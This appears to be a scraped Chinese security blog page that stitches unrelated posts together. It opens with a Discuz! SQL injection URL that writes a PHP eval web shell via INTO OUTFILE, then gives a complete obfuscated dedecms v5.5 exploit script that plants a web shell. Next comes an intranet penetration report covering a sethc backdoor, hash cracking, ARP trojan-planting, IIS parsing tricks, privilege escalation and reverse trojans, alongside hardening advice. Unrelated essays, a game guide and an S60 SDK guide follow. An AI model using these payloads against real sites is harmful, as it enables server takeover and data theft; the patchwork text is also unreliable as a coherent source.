相关代码：

if($option == 'del') {

$appid = intval($_GET['appid']);

$db->query("DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'");

showmessage('manyou:done', 'userapp.php?script=notice&action=invite');

} elseif($option == 'deluserapp') {

$hash = trim($_GET['hash']); //此处并没有进行过滤，直接导致注入的产生

if($action == 'invite') {

$query = $db->query("SELECT * FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");

if($value = $db->fetch_array($query)) {

$db->query("DELETE FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");

showmessage('manyou:done', 'userapp.php?script=notice&action=invite');

} else {

showmessage('manyou:noperm');

}

} else {

$db->query("DELETE FROM {$tablepre}mynotice WHERE id='$hash' AND uid='$discuz_uid'");

showmessage('manyou:done', 'userapp.php?script=notice');

}

}

很简单的一个漏洞。在没有查询结果返回的情况下我们往往只有采取盲注的方式，但如果当前数据库帐号有File_priv的话我们也可以直接into outfile

/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,

NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23

0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E是
的十六进制表示。
但想
into outfile的话，我们还得有web的物理路径，有两种爆路径的方法
/manyou/admincp.php?my_suffix=%0A%0DTOBY57
/manyou/userapp.php?%0D%0A=TOBY57

相关文章

• Discuz!NT 3.0 特殊环境下利用漏洞
• Discuz 群体攻击第三波出现
• Discuz!账号发放插件注入0day
• Discuz! $_DCACHE数组变量覆盖漏洞
• Discuz7 记录明文
• discuz!7.1、7.2远程代码执行漏洞exploit
• fckeditor漏洞,通杀PHPMPS
• XOOPS 2.2.6 鸡肋本地包含漏洞
• 封堵Windows Server 2008几个明显漏洞
• 动网多个版本上传漏洞

<?php

print_r('

+----------------------------------------+

dedecms v5.5 final getwebshell exploit

+----------------------------------------+

');

if ($argc < 3) {

print_r('

+----------------------------------------+

Usage: php '.$argv[0].' host path

host: target server (ip/hostname)

path: path to dedecms

Example:

php '.$argv[0].' localhost /dedecms/

+----------------------------------------+

');

exit;

}

error_reporting(7);

ini_set('max_execution_time', 0);

$host = $argv[1];

$path = $argv[2];

$post_a = 'plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97)

.chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104)

.chr(101).chr(47).chr(116).chr(46).chr(112).chr(104)

.chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112)

.chr(104).chr(112).chr(32).chr(101).chr(118).chr(97)

.chr(108).chr(40).chr(36).chr(95).chr(80).chr(79)

.chr(83).chr(84).chr(91).chr(39).chr(116).chr(39)

.chr(93).chr(41).chr(59).chr(63).chr(62));/*';

$post_b = 'needCode=aa/../../../data/mysql_error_trace';

$shell = 'data/cache/t.php';

get_send($post_a);

post_send('plus/comments_frame.php',$post_b);

$content = post_send($shell,'t=echo tojen;');

if(substr($content,9,3)=='200'){

echo "\nShell Address is:".$host.$path.$shell;

}else{

echo "\nError.";

}

function get_send($url){

global $host, $path;

$message = "GET ".$path."$url HTTP/1.1\r\n";

$message .= "Accept: */*\r\n";

$message .= "Referer: http://$host$path\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $host\r\n";

$message .= "Connection: Close\r\n\r\n";

$fp = fsockopen($host, 80);

if(!$fp){

echo "\nConnect to host Error";

}

fputs($fp, $message);

$back = '';

while (!feof($fp))

$back .= fread($fp, 1024);

fclose($fp);

return $back;

}

function post_send($url,$cmd){

global $host, $path;

$message = "POST ".$path."$url HTTP/1.1\r\n";

$message .= "Accept: */*\r\n";

$message .= "Referer: http://$host$path\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $host\r\n";

$message .= "Content-Length: ".strlen($cmd)."\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $cmd;

$fp = fsockopen($host, 80);

if(!$fp){

echo "\nConnect to host Error";

}

fputs($fp, $message);

$back = '';

while (!feof($fp))

$back .= fread($fp, 1024);

fclose($fp);

return $back;

}

?>

相关文章

• dedecms 5.3 – 5.5注入漏洞
• 瑞星本地提权通杀利用代码
• IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告
• Gnuboard 0day&Exp
• 新云4.0最新0day
• phpcms2008 最新0day & Exp
• PHP168 6.0及以下版本0day
• Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)
• Discuz!账号发放插件注入0day
• Microsoft Internet Infomation Server 6.0 ISAPI Filename Analytic Vulnerability

相关文章

• No Related Post

一.          本次目标的环境.

1.1 内网网络拓图以及平台介绍.

1.2 渗透测试的目的.

1.3 此次渗透目标内容和范围.

1.4 规避的风险.

二. 此次内网渗透过程.

2.1 内网突破（Socket端口转发以及终端连接）.

2.2 系统口令获取,Hash破解,管理软件密码破解.

2.3 社会工程学以及密码习惯组合字典扫描收集管理信息.

2.4 内网常用的IPC$共享入侵.

2.5 ARP探嗅以及ARP挂马突破员工PC.

2.6 ERP内部员工办公系统挂马（Internet Explorer Aurora Exploit 2010-01-17）利用.

2.7 利用同步数据软件进行渗透 .

2.8 利用IIS可写权限配合IIS6.0文件后缀名解析漏洞进行突破.

2.9 利用Windows XP 2K远程,local Exploits,溢出进行权限获取和提升.

3.0 以上方法配合反弹远程控制木马配合.

3.0.1 域内的HASH注入攻击突破（未实现成功）

三. 目标系统安全加固解决办法总结.

3.1 访问控制.

3.2 电信和网络安全.

3.3 安全管理与实践.

3.4 应用和系统开发安全.

1.1

内网网络拓图以及平台介绍

目标网络规模为一个三层交 换环境

IP地址分布以及业务分类

192.168.100.X-192.168.103.X 数据内部员工办公网路

176.12.1.X-176.12.15.X 为Web于数据库支持网路

192.168.11.X-192.168.11.255 为空闲网络区域

总共分为三个域 shjt   cyts   ccit 共467台计算机

以上信息是在渗透过程中得到的

为了方便我改写了一个批处理

代码为

============================domain.bat=======================

@echo off

setlocal ENABLEDELAYEDEXPANSION

@FOR /F "usebackq   delims=, " %%J IN (`net view /domain ^|find "命令執行成功" /v ^|find "The command completed successfully." /v ^|find "命令成功完成" /v ^|find "--" /v ^|find "Domain" /v ^|find "" /v ^|find "コマンドは正常に終了しました" /v /i`) do (

@echo =====domain:%%J========

@FOR /F "usebackq eol=;   delims=, " %%i in (`net view /domain:%%J ^|findstr ""`) DO (

@FOR /F "usebackq eol=; tokens=1,2,3* delims=" %%a in (`echo %%i`) do (

@FOR /F "tokens=1,2,3,4* usebackq delims=: " %%K IN (`@ping -a -n 1 -w 100 %%a ^|findstr "Pinging"`) do (

@echo %%L      %%M

)

)

)

)

echo %0

==============================end===================================

系 统类型.安装软件版本以及类别

Windows xp 2K以及Linux

Mssql2000 2005 Sybase IIS5.0 6.0 内网系统全部采用麦咖啡企业级个别伺服器安装了数据同步软件

1.2

渗透测 试的目的

渗透测试一方面可以从攻击者的角度，检验业务系统的安全防护措施是否有效，各项安全策略是否得到贯彻落实；另一方面可以讲潜在的安 全风险以真实事件的方式凸现出来，从而有

助于提高相关人员对安全问题的认识水平。渗透测试结束后，立即进行安全加固，解决测试发现的安全问 题，从而有效地防止真实安全事件的发生

1.3

此次渗透目标内容和范围.

此次渗透的 为内容为目标数据库服务器以及员工办公PC..

1.4

规避的风险

此次渗透是在不影 响目标业务工作的前提下进行测试，个别渗透测试手法已在本地搭建测试完成之后再应用到目标，以保证目标业务正常，（如ARP探嗅 ARP ERP办公系统挂马突破，其中IE0day利用测试已本地通过不会造成目标员工办公PC崩溃或者出现异常） .

此 次内网渗透过程

2.1

内网突破（Socket端口转发以及 终端连接）

通过外網web服務器222.11.22.11(192.168.22.34)(假设IP）上的Web Shell，连接内网ip為192.168.22.35的Mssql2005服务器, 当前账户权限为Sa.（账户密码通过查看Web.config得到）Sa账户是Mssql的默认的最高权限账户由于MSSQL服务是以SYSTEM权限运 行的，而MSSQL刚巧提供了一些能够执行命令的函数加入能成功利用，会得到一个SYSTEM权限，所以我认为这会有很大机会让我利用成功（如 xp_cmdshell xp_dirtree xp_fileexistxp_terminate_process sp_oamethod sp_oacreate xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_regenumvalues sp_add_job  sp_addtask    xp_regread  xp_regwrite xp_readwebtask xp_makewebtask xp_regremovemultistring  sp_OACreate）由于SQL 服务器处于硬防之下，一般在防火墙做的限制都是禁止外部连接内网，没有限制由内置外的连接.我们通够Socket端口转发来进行突破.本地监听如图

本 地Mstsc.exe host 127.0.0.1:88

2.2系统口令获取,Hash破解,管理软件密码破解

这 之前替换sethc.exe为cmd.exe程序-系统做放大镜后门得到一个CMD Shell为渗透提供方便（在渗透完成之后所有的目标文件都已经恢复）通过Cmd Shell连接本地Ftp Server Get Hash.exe(系统口令哈希值获取工具）VNC4密码获取工具GUI版到当前主机，【VNC4的密码是保存在注册表中的地址 为：HKEY_LOCAL_MACHINESOFTWARERealVNCWinVNC4password 】抓取密码之后通过FTP PUT返回本机.抓取没有出现提示14位以上，直接通过在线的LM密码查询网站进行查询如：

两个常用的Hash在线破解网站

http://cracker.offensive-security.com/index.php

http://www.objectif-securite.ch/en/products.php

得 到系统当前主机管理员密码为ccit2006 VNC4密码为如下图

2.4 内网常用的IPC$共享入侵

IPC$共享入侵时渗透公司企业内网一个比较快速的途径，（这也是企业内部员工密码安全意 识薄弱的弱点）为了增快渗透速度我决定放弃手工而选用图形界面化的工具，结合上一步骤扫描.,在上一步骤为了避免扫描器过多占用系统资源导致当前主机不稳 定的情况，在选择扫描模式和线程上注意调整，适应当前主机的承载能力，如图，进行的IPC$共享以及弱口令扫描利用

在 以上步骤上为了方便我采用为存在漏洞的机器植入反弹木马

2.5 ARP探嗅以及ARP挂马突破员工PC.

由于目标ARP设置存在安全缺陷，导致可以使用ARP探嗅和欺骗得到敏感数据 以及网页挂马我们选择的是该目标内网员工的ERP办公系统。在这次探嗅中我选用了两种大白鲨和cain （大白鲨截图丢失）如图

网页木马选择的是2010-01-17发布的IE漏 洞EXP。成功获取到部分员工Windows XP权限

2.6 ERP内部员工办公系统挂马（Internet Explorer Aurora Exploit 2010-01-17）利用

在 某些时候ARP挂马不一定生效，既然有了内部员工ERP办公WEB的权限那我就试试最新公布的Internet Explorer Aurora Exploit   为了规避风险问题，我决定在本地测试Internet Explorer Aurora Exploit  的 稳定性，保证代码不造成目标员工PC电脑IE崩溃或者是程序异常（员工PC电脑的浏览器版本是在IPC$获取员工权限后查看所得）以下是部分测试截图，目 前metasploit3.34已经更新了EXP。

www.smxiaoqiang.cn

2.7 利用同步数据软件进行渗透

很多企业内网都安装了为数据提供同步的软件，但是安全配置上的失误导致入侵者可以通过这个将 渗透木马病毒延伸到各个角落，利用文件数据同步软件进行渗透的思路就是在同步的数据或者文件中篡改或者添加可以获得SHELL的文件如，Web asp PHP木马或者其他的补丁程序.（由于当时的图片已经丢失，就不做具体说明了）

2.8 利用IIS可写权限配合IIS6.0文件后缀名解析漏洞进行突破.

在2009年初IIS6.0就被公布出了存在文件后 缀名解析漏洞，格式为x.asp;.jpg，很多的IIS6.0可写权限都是put到目标可以move成Web Shell的时候出现失败的问题，我细心测试后发现可以结合这两个鸡肋做点文章。那就是move后缀时候用x.asp;.jpg来实现.如图。IIS权限 和安全配置失误一直是很多粗心大意的管理容易犯的问题

成功得到Web Shell 然后通过查看网站数据库配置信息来继续收集目标账户密码信息。

2.9 利用Windows XP 2K远程,local Exploits,溢出进行权限获取和提升

在 上一步骤渗透得到一Web Shell，发现本机没有安装麦咖啡杀毒软件没有安装可供提升权限的第三方软件，通过systeminfo查看目标补丁信息如图

我通过Churrasco.exe来提权.这个loacl Exploits是2008-06发布的，相比之下成功率较高

也可以利用一些新的系统 软件漏洞进行权限提升针对这个系统我只找到这个可以

提升权限成功如图

2.9 以上方法配合反弹远程控制木马配合.

以上各类渗透手法的目的是获取权限，为了方便我使用远程控制软件，IPC$植入反 弹木马MSSQL连接上传植入木马执行.local Exploits 提权执行反弹木马都是可以的（我不赞成使用黑客工具，这次渗透式经过对方允许使用此类软件.这些软件会在对方系统植入档案改变设定.完成之后已经彻底清除 卸载恢复）

在这次渗透中共获取计算机权限52个，这其中达到了我们渗透的目标，内部员工办公PC，客户数据库等等，公司内部的MAIL邮箱 对付一个企业的发展来说做必要的渗透测试并对系统，数据加固是很重要的，部分如图：

在 渗透测试完成之后，所以在过程中利用到的记录器以及工具反弹木马都已经删除，系统恢复原状.此次渗透中获取的一些商业信息已完全删除.

并提 交报告于目标的网络管理员。

目标系统的安全加固和安全问题和解决参考

3.1 访问控制

1.      防火墙访问控制策略配置不完善，没有完全发挥边界防护的作用，内网数据存在泄露到外网的可能。

解决办法：

根据业务和安全需求调整访问控制策略，去掉冗余的规则，做到 最小化原则。如细化防火墙对应用服务区域的访问控制策略等。

2.      没有修改网络设备的默认口令，可能造成非授权人员的访问。

解决办法：

设置一个足够复杂的强口令并定期更换，同时在交换机上做访问控制规则，对登录设备的IP进行限 制。

3.      防火墙的管理仅使用一个超级用户。

解决办法：

根据业务需求，重新分配用户和权限，做到权责分明。

4.      操作系统帐号/口令策略采用默认设置

解决办法：

加强帐号/口令策略安全配置，增强当前服务器用户口令强度，并加强对特权用户远程登录的控制和管 理，使用SSH加密方式对服务器进行远程管理，以防用户/口令信息泄露。

员工密码安 全意识薄弱，可以对员工进行安全培训

5.      目标系统管理员访问控制存在安全隐患

解决办法：

管理员（内部员工）访问目标系统应设定严格的访问控制措施，如基于IP地址，MAC，只允许管理员 （内部员工）在设定的IP地址对系统进行操作，避免因管理员（内部员工）帐户/密码泄漏给系统带来的威胁。

3.1电信和网络安全

6.      防火墙没有启用足够的抗攻击等防护功能

解决办法：

启用防火墙必要的抗攻击功能。

1、 可在根据日志审计的统计数据辅助设置开启抗攻击功能的阀值,FW上每个访问控制规则的日志也要接入，但防火墙抗网络攻击的能力和范围有限。

2.或者在防火墙前面架设电信级IPS，可抵御大部分网络攻击和拒绝服务攻击

3.2安全管理与实践

7.      部分设备还没有开启日志审计功能，使得潜在的攻击事件不具备追溯性

解决办法：

尽快部署专业日志审计服务器实现对设备日志的收集、存放和审计。

8.      互联网区没有划分安全域

解决办法：

启用核心交换机 第三层功能，根据业务需求划分VLAN，并在VLAN之间实施适当的访问控制。

1. 在交换机上根据业务类型或者功能划分VLAN，可缓解业务高峰时的网络风暴的威胁，但须事先做好路由规划

2. 在各个安全域边界架设网络防火墙来防止因单一安全区域的蠕虫木马的扩散。

3. 在交换机上启用IP策略设定和禁止内部访问外部陌生地址.

3.3应用和系统开发 安全

9.      操作系统没有关闭默认启动的冗余服务

解决办法：

根据业务需要，只开启必须的服务，关闭冗余的服务。避免冗余服务所带来的安全隐患

10.              数据库监听器配置

解决办法：

修改监听器配置，为监听器配置口令，这样对监听器进行操作时必须先输入口令进行认证；修改监听器配 置参数，将“ADMIN_RESTRICTIONS”设为“ON”，这样在监听器运行时将禁止通过命令对监听器进行任何修改，必须手动修改监听器配置文件 listener.ora才可以对监听器配置进行修改。

11.              数据库当前没有启用审计

解决办法：

启用数据库的审计功能或者部署专业的数据库审计系统对数据库系统管理、安全管理、数据维护、用户登 录等事件进行审计，并由专人负责数据库的审计管理。

为了避免数据库开启监听功能后带 来的性能问题，可以部署数据库安全审计设备。

12.              管理服务器存在高风险漏洞

解决办法

对用于集中对应用服务器和数据库服务器进行远程管理的PC服务器安装最新的安全补丁。

1.       在网络中架设补丁分发管理系统

2.       在网络中架设漏洞扫描器，可及时了解网络中的设备的漏洞情况

3.       对麦咖啡企业级防火软件设定管理密码，防止他人更改安全设置

13.              目标系统登录密码安全策略控制不严

解决办法

此次目标系统中应提高密码复杂度的要求，对用户密码进行检查，以提高用户密码的安全级别，如必须是 数字和字母的组合等；定义可尝试输入密码的次数和对尝试输入密码采取相应安全策略，如连续输入3次错误密码，将锁定用户一小时等，防止恶意人员对用户的密 码暴力破解。

14.              目标WEB系统异常输入检验机制存在缺陷

解决办法

根据实际情况对输入参数进行严格检查，包括输入字符的长度、类型，并对一些特殊字符进行过滤。在 WEB服务器前面架设WEB应用防火墙可以定义非法字符的过滤策略。

15.              交换机使用默认的SNMP连接串

解决办法

设置一个具备一定复杂度的SNMP连接串。

1.       在交换机上修改。命令参考：

Router(config)#snmp-server community public/private RO

2.  在网络中架设漏洞扫描器可以检测出该漏洞

3.4加密

16.              目标系统的通信未采取加密措施

解决办法

对目标WEB数据传输进行加密，如采用https方式。更高安全级别考虑，建议考虑使用SSL vpn或HTTPS解决方案。

一.    目标系统安全加固解决办法总结

渗透测试发现的问题中，大多数是可以通过对现有的网络设备、安全设备、WEB数据库、WEB服务器、中间件等进行配置优化调节来解决的。但 是仍然有几个问题是目前无法通过现有网络资源解决的，我们总结了一下大概有以下三点：

加密：可以对目标的数据传输进行加密

应用与系统安全：目标WEB系统异常输入检验机制

应用与系统安全：数据库安全审计

3.1       加密

目前解决目标数据传输进行加密有两种办法：

在WEB应用系统软件上面开启HTTPS传输功能。

HTTPS是以安 全为目标的HTTP通道，简单讲是HTTP的安全版。它的主要作用可以分为两种：一种是建立一个信息安全通道，来保证数据传输的安全；另一种就是确认网站 的真实性。HTTPS协议是由SSL+HTTP协议构建的可进行加密传输、身份认证的网络协议要比http协议安全。

但是我认为在WEB应用软件上面开启这项功能并不适用目标的员工办公系统以及为客户提供服务的系 统。因为HTTPS服务器是需要对传输的数据加密和解压的，大规模的部署势必会严重影响WEB服务器的运行性能，最终导致服务器拒绝服务。

在WEB应用服 务器前架设 SSL VPN加速器。

总结

古 话说的好“堡垒最容易从内部突破”此次渗透案例正是诠释了这句话的.

相关文章

• 域内网中的信息收集之一内网结构的探测
• 内网渗透中SSh的巧用
• 内网渗透心得
• 高级内网渗透工具:Paris (创建VPN)
• 大企业内网渗透的常见软件级突破点

首先，得明确一点：任何人都没有义务公开自己的研究，任何人都没有权利要求别人公开自己的研究——尤其是那些自己没公开过什么的人。不过似乎不少人 都有自己的一套理论，能够找出充分的理由来为此义愤填膺，就像七八岁的小男孩得不到想要的游戏机一般义愤填膺。

从我这些年的经验来看，在英语世界里，北欧技术交流气氛最好。其次是中欧，再次西欧，美国排最后。为什么呢，因为像瑞士、瑞典、芬兰这样的披着资本 主义狼皮的社会主义国家里，在超市干三年收银员就可以买栋房子，人们永远不担心没钱看病，不担心失业。所以，人家搞技术的动力基本上都是马斯洛四层以上， 咱们这样还得兼顾三层以下的，跟人家没法比。

但是咱们毕竟也是社会主义国家，虽然是初级阶段，但大家好歹都还不至于挣扎在一二层，所以贴点文章，聊点问题，也很合逻辑。但是这几年情况有有些变 化。

首先，一个根源问题是整个信息安全技术的基础部分已经差不多都码完了。各种理论和技术都很成熟，该有的文档也都有了。再要搞点什么东西，基本上都是 建立在一堆参考资源之上的实际应用。而越接近实用的东西，越不会有人愿意往外放。这个道理很容易理解：你随便到哪个书店都能买到讲E=MC²、原子裂变， 甚至如何浓缩铀等等这些高深理论的书，但是绝对买不到哪怕制造原子弹外壳的具体配方。

如果整个大环境还保持在2003年之前的状态，可爱的Hacker们倒也不会太在乎实用不实用。但是世道毕竟变了。一部分人开始挣黑钱，他们当然就 不会再跟别人分享发家致富的秘方。而另外一些没去挣黑钱的，也不会愿意把自己的东西白白送给别人拿去发家致富，宁可搞出来自娱自乐，然后烂在地里。于是， 最近几年虽然国内搞这玩意的人多了，水平高的人也多了，但是真正高水平的公开交流却少了。

客观原因摆在这里，所以抱怨毫无意义，绝对不会改变什么。

不过我前面也已经说过了，其实这一块儿的基础文档已经很齐备了，无论你想学什么，都可以找到资料。除非你并不真的想学，只是给自己学不会找个理由而 已。

相关文章

• 《阿凡达》告诉我们：谁胯下的鸟大就听谁的
• 经典n则
• 看看当年的2B版”Dir溢出”娱乐一下
• 汇报漏洞时，我所面对的几种公司态度
• 雷人版《潇洒走一回》
• 你以前没看过的99句互联网上暴强语录
• 超强牛人酒后驾驶面对记者还摆出各种POSE
• 从蜗居看老男人的魅力
• Blog搬家成功
• 【转载】我和老公的那些害羞事儿

这样就不会再弹出广告了，一切清静了。其实这个原理很 简单，就是让千千静听不能创建名为info的文件夹，那个文件夹的作用是保存弹出广告的。

相关文章

• 手工屏蔽迅雷技巧【禁止上传、广告、迅雷看看15秒广告】
• MySQL导入数据库文件最大限制2048KB的修改解决办法
• wp-postviews和Wp Super Cache有冲突
• 流量过大，不得不启用WP Super Cache
• 让 Windows 开机自动拨号上网
• 防止.NET木马列所有站物理路径，防止.JPG类型木马
• some shit tips
• 360 模拟点击demo
• 当渗透中实时检测管理员的bat
• 利用注射点判断数据库web是否分离

相关文章

• 为什么近几年公开的技术交流越来越少
• 经典n则
• 看看当年的2B版”Dir溢出”娱乐一下
• 汇报漏洞时，我所面对的几种公司态度
• 雷人版《潇洒走一回》
• 你以前没看过的99句互联网上暴强语录
• 超强牛人酒后驾驶面对记者还摆出各种POSE
• 从蜗居看老男人的魅力
• Blog搬家成功
• 【转载】我和老公的那些害羞事儿

在ava游戏中兵种是有“技能”和“勋章”的设定，而不同兵种“技能”又有所不同，　　为了让玩家更全面的了解ava的 “技能”和“勋章”概念，下面就具体介绍一下：
一  如何查看ava游戏中不同兵种技能
玩家在“游戏大厅”→“我的信息”→“技能信息”→“兵种技能”就可以查看所在账号中各个兵 种的技能获得情况。

二如何获得ava游戏中不同兵种的技能
1侦查兵技能的获得方式

侦察兵技能全部获得后，就会得到“侦察兵队长纪念章”并获得5000游戏币

2步枪兵技能的获得方式

步Qiang技能全部获得后，就会得到“步**队长纪念章”并获得5000游戏币

3狙击手技能的获得方式

狙击手技能全部获得后，就会得到“狙击手队长纪念章”并获得5000游戏币

三ava游戏中不同兵种的重要技能解析
1侦察兵
相较另外两个兵种侦察兵的技能获得比较容易，但是一定要注意“战场了解术”是侦察兵最有用的的技能， “高级战场了解术”与“基本战场了解术”的分别是前者小地图的战场可视范围更大。

2步Qiang手　 　步Qiang手的技能是最难练的，尤其是“投掷训练”和“瞄准射击”中的“手雷伤害”和“爆头”很多时候运气占很大的成分。    但是步**的技能中的“防御术”和“致命伤害防御术”又恰恰是所有兵种最实用的技能，下面有一组公式仅供玩家参考。　　“致命伤害防御术”　　1.头盔防 御技能:能增加头盔的吸收能力与耐久度，经过测试基本为15%左右　　2.2:高级头盔防御技能:能增加头盔的吸收能力与耐久度,经过测试基本为30%左 右　　“防御术”　　1.初级防御技能:能增加武器吸收**伤害的效果,经过计算为2%左右　　2.中级防御技能:能增加武器吸收**伤害的效果,经过计 算为5%左右　　3:高级防御技能:能增加武器吸收**伤害的效果,经过计算为8%左右

3狙击手　　狙击手的技能获得方式介于其它两种兵种之间，只是“***训练”需要切换到***射杀这 对擅长远距离狙击手们来说是不小的挑战。

四ava游 戏勋章系统

玩家在“游戏大厅”→“我的信息”→“勋章信息”中就可以查询到游戏人物的勋章信息，ava勋章系统主要由 三部分组成：

1技能勋章

2英雄勋章

3战术勋章

每局游戏结束后满足相应的条件就会获得相应的勋章并同时 获得相应的补给或游戏币

通过以上的介绍相信各位玩家已经对ava的各兵种“技能”和“勋章”系统有了深入的了解， 希望这些文字能让玩家在ava中有更好游戏体验。祝各位游戏愉快！

相关文章

• No Related Post

某单位网站服务器被黑了，他打电话求助别人帮他改了密码，然后登录，我看他老把密码输入在用户名处登不进，我很纳闷这是干什么？我也没提醒他，过了 好久他不得不向我求助说进不了，然后我教他用户名处输入用户名，密码处输入密码，他感谢我说又学了一个技巧。我很纳闷，问他你在这做网管做多久了，他说做 了有五年了。我看他桌子上还摆了一大堆的技术书籍。

其实这样的事情数不胜数，跟朋友闲聊得知有很多类似荒诞的事让人抓狂：

朋友给一家zf单位做安全检查和加固，发现所有主机管理员密码全部是123456，叫技术人员们改密码，他们很怀疑的眼光说，密码没告诉别人，黑客 怎么能知道？朋友解释这个密码太简单，靠手工猜测就能猜出来，他说黑客哪有可能偏会猜这个呢？然后又解释一堆，说黑客字典里都有这个密码，他还是不理解， 怎么会有？我没告诉他们啊，怎么黑客字典里都有呢！%￥(&^&

然后给的安全解决方案其中一项就是改密码。数日后，zf技术人员打来电话，问“怎么这么久你还没给我改密码，我要投诉你！”然后又解释了一大堆，密 码是他们自己内部改，让他改他就知道了！他还是不理解，你们不是做安全的么，密码不由你们改谁改？^%&%^$&^%

还有的技术人员也不是不懂技术：
某地做安全检查，朋友检查发现木马要把木马清掉，负责人说不要清掉!你清掉了，黑客进不来他们万一采取更大的报复怎么办？无语。。。

某业内人士   11:43:44
有的黑客也经典

某业内人士 11:44:31
某地发生DoS攻击，我去应急，黑客打来电话，逼要系统密码，否则就一直DoS
某业内人士 11:44:46
我和客户都哭笑不得

相关文章

• 为什么近几年公开的技术交流越来越少
• 《阿凡达》告诉我们：谁胯下的鸟大就听谁的
• 看看当年的2B版”Dir溢出”娱乐一下
• 汇报漏洞时，我所面对的几种公司态度
• 雷人版《潇洒走一回》
• 你以前没看过的99句互联网上暴强语录
• 超强牛人酒后驾驶面对记者还摆出各种POSE
• 从蜗居看老男人的魅力
• Blog搬家成功
• 【转载】我和老公的那些害羞事儿

开发环境搭建
安装包准备
S60手机开发环境由JDK、ActivePerl、S60 C++ SDK和Carbide C++等软件包（软件环境）构成，其中Cabide C++是集成开发环境，也可以选用其它的同类软件，例如Visual Studio 2003。它们都是可通过互联网自由下载的免费软件。
JDK 5.0 Update 16
S60 SDK中的部分工具程序是Java程序，依赖于JVM环境。Carbide C++也是由Java语言开发，依赖于JVM。JDK由SUN公司提供，包含JVM，和S60 SDK配合比较好的版本是JDK 5.0 Update 16，下载地址是http://java.sun.com。
ActivePerl 5.6.1.635
S60 SDK的编译工具大都由Perl脚本编写而成，因此依赖于Windows平台下的Perl环境。ActivePerl由ActiveState公司提供， 下载地址是http://downloads.activestate.com/ActivePerl/。
S60 Platform SDK for C++, 3rd Edition FP2
S60 SDK中包含了开发S60程序所需的各种工具和程序库，以及手机模拟器。S60 SDK由诺基亚提供，下载地址是http://www.forum.nokia.com。
Carbide C++ Express 1.3
Carbide C++是基于Eclipse平台实现的集成开发环境，专为开发S60程序设计，由诺基亚提供，下载地址是 http://www.forum.nokia.com。
安装软件包
上述四种安装包相互之间存在依赖关系，必须按特 定的安装顺序安装，推荐的安装顺序是：JDK → ActivePerl → S60 SDK → Carbide C++。
S60 SDK要求和开发者创建的源代码存在于同一个硬盘分区下，为了避免兼容性问题，最好将上述安装包都安装在C盘。在安装过程中，无需变更选项，直接使用默认 选项安装即可。
验证开发环境
在安装工作完成后，我们将编译S60 SDK中的一个例子来验证开发环境的完整性和正确。这个例子是“helloworldbasic”，位于 “C:S60devicesS60_3rd_FP2_SDKS60CppExamples”目录中。
首先，启动Carbide C++，选择菜单[File]→[Import…]导入“helloworldbasic”项目。Carbide C++包含一个项目导入向导，引导开发者导入项目配置。在此向导中，选择例子程序所在的目录，其它选项均使用默认值，即可成功导入这个项目并在 Carbide C++中打开。
为模拟器编译
项目打开后，默认即是模拟器编译配置，选择菜单 [Run]→[Debug As] →[Debug Symbian OS Application]，Carbide C++会自动编译项目，然后调用SDK中的模拟器运行这个程序。编译开始后，可以看到Carbide C++的Console窗口不断输出编译信息，如果编译过程中发生错误，Console窗口中会显示相关的错误信息。
为手机编译
首 先，选择菜单[Project]→[Build Configurations] →[Set Active] →[Phone Release]，将编译配置切换至手机发布状态。然后，选择菜单[Project] →[Build Project]开始编译手机软件包。Console窗口中仍然会显示相关的编译信息。
编译完成后，在例子项目的“sis”目录中会生 成手机安装包。使用数据线连接手机和PC，即可将“helloworldbasic”安装到手机上运行。
参考文献：
[1]Babbin, Steve/ Harrison, Richard. Developing Software for Symbian OS. John Wiley & Sons, Ltd, 2006
[2]Leigh Edwards, Richard Barker. Developing Series 60 Applications. Nokia

相关文章

• 诺基亚S60短信攻击详细操作
• 诺基亚S60平台手机短信漏洞深度分析